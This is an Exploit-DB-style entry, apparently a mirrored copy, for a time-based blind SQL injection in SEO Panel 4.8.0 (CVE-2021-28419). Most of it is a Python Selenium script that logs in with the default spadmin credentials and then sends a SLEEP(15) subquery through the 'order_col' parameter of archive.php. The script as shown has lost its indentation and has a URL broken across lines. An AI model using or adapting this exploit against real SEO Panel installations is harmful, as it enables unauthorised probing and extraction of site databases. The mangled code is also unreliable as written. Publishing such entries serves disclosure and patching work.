SEO Panel 4.8.0 – ‘order_col’ Blind SQL Injection (2)

  • 作者: nu11secur1ty
    日期: 2021-04-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49804/
  • # Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)
    # Author: nu11secur1ty
    # Testing and Debugging: nu11secur1ty
    # Date: 04/25/2021
    # Vendor: https://www.seopanel.org/
    # Link: https://www.seopanel.org/spdownload/4.8.0
    # CVE: CVE-2021-28419
    
    [+] Exploit Source:
    
    #!/usr/bin/python3
    # Author: @nu11secur1ty
    # CVE-2021-28419
    
    from selenium import webdriver
    import time
    
    
    #enter the link to the website you want to automate login.
    website_link="http://192.168.1.3/seopanel/login.php"
    
    #enter your login username
    username="spadmin"
    
    #enter your login password
    password="spadmin"
    
    #enter the element for username input field
    element_for_username="userName"
    
    #enter the element for password input field
    element_for_password="password"
    
    #enter the element for submit button
    element_for_submit="login"
    
    
    browser = webdriver.Chrome()
    browser.get((website_link))
    
    try:
    username_element = browser.find_element_by_name(element_for_username)
    username_element.send_keys(username)
    password_element= browser.find_element_by_name(element_for_password)
    password_element.send_keys(password)
    signInButton = browser.find_element_by_name(element_for_submit)
    signInButton.click()
    
    # Exploit
    browser.get(("
    http://192.168.1.3/seopanel/archive.php?from_time=2021-04-25&order_col=(SELECT
    7397 FROM
    (SELECT(SLEEP(15)))nu11secur1ty)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id=1"))
    
    print("payload is deployed MySQL is not responding correctly...\n")
    
    except Exception:
    #### This exception occurs if the element are not found in the webpage.
    print("Some error occured :(")